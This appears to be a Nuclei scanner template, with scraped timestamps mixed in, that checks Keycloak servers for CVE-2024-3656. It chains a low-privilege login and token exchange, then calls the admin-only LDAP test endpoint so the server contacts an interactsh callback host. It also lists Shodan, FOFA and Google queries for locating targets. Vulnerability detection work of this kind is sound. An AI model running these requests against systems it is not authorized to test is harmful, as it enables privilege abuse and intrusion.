2024-10-18 11:43:03 +00:00
id : CVE-2024-3656
info :
name : Keycloak < 24.0.5 - Broken Access Control
author : iamnoooob,rootxharsh,pdresearch
severity : high
description : |
A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.
reference :
- https://cn-sec.com/archives/3262467.html
- https://github.com/advisories/GHSA-2cww-fgmg-4jqc
- https://access.redhat.com/errata/RHSA-2024:3575
- https://access.redhat.com/security/cve/CVE-2024-3656
- https://bugzilla.redhat.com/show_bug.cgi?id=2274403
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
cvss-score : 8.1
cve-id : CVE-2024-3656
cwe-id : CWE-200
epss-score : 0.0007
epss-percentile : 0.31545
metadata :
verified : true
max-request : 5
vendor : redhat
product : keycloak
shodan-query :
- http.favicon.hash:"-1105083093"
- http.html:"keycloak"
- http.title:"keycloak"
fofa-query :
- icon_hash=-1105083093
- body="keycloak"
- title="keycloak"
google-query : intitle:"keycloak"
tags : cve,cve2024,keycloak,auth-bypass,authenticated
variables :
username : "{{username}}"
password : "{{password}}"
realm : "master"
code_verifier : "7BhCLfrzYxLzq3XzrfiA8TplZBDciJ0RZepiiDujJKwOaMDzMZWcqGvrCfYH6s735tzxteIUH1vWLP1D2xXm88O9XFEnxcx2"
2024-10-18 11:47:35 +00:00
code_challenge : "{{ trim_right(replace(replace(base64(hex_decode(sha256(code_verifier))),'/','_'),'+','-'),'=') }}"
2024-10-18 11:43:03 +00:00
# we can also hardcode code_challenge to wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto
http :
- raw :
- |
GET /realms/{{realm}}/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2f{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge={{code_challenge}} HTTP/1.1
Host : {{Hostname}}
extractors :
- type : regex
name : tabid
part : body
internal : true
regex :
- "&tab_id=(\\w+)&"
group : 1
- raw :
- |
GET /realms/{{realm}}/login-actions/authenticate?client_id=security-admin-console&tab_id={{tabid}}&client_data=eyJydCI6ImNvZGUiLCJybSI6InF1ZXJ5Iiwic3QiOiIxIn0= HTTP/1.1
Host : {{Hostname}}
extractors :
- type : regex
name : auth_url
part : body
internal : true
regex :
- '"login.disabled = true; return true;" action="(.*?)"'
group : 1
- raw :
- |
POST {{replace(auth_url,'&','&')}} HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
username={{username}}&password={{password}}&credentialId=&
extractors :
- type : dsl
name : codevalue
internal : true
dsl :
- replace_regex(http_3_location,".*&code=","")
- raw :
- |
POST /realms/{{realm}}/protocol/openid-connect/token HTTP/1.1
Host : {{Hostname}}
Content-type : application/x-www-form-urlencoded
code={{codevalue}}&grant_type=authorization_code&client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2F{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&code_verifier={{code_verifier}}&
extractors :
2024-10-18 11:47:35 +00:00
- type : json
part : body
name : access_token
json :
- '.access_token'
internal : true
2024-10-18 11:43:03 +00:00
- raw :
- |
POST /admin/realms/{{realm}}/testLDAPConnection HTTP/1.1
Host : {{Hostname}}
authorization : Bearer {{access_token}}
content-type : application/json
{
"action": "testConnection" ,
"connectionUrl": "ldap://{{interactsh-url}}/" ,
"bindDn": "cn=admin,dc=example,dc=com" ,
"bindCredential": "password" ,
"useTruststoreSpi": "ldapsOnly" ,
"connectionTimeout": "5000"
}
matchers-condition : and
matchers :
- type : dsl
dsl :
- 'contains(interactsh_protocol, "dns")'
- type : word
part : body
words :
- 'HTTP 403 Forbidden'
negative : true
2024-10-18 13:11:55 +00:00
# digest: 4a0a00473045022100fca6e12ccfe96a6531f58841768f9b77a614c9152b88541e3cf76c7cc323501a02204fa65d460da2a2886019b307d6f88ecaa9894a451294c9ee48733896f3a0cba7:922c64590222798bb761d5b6d8e72950
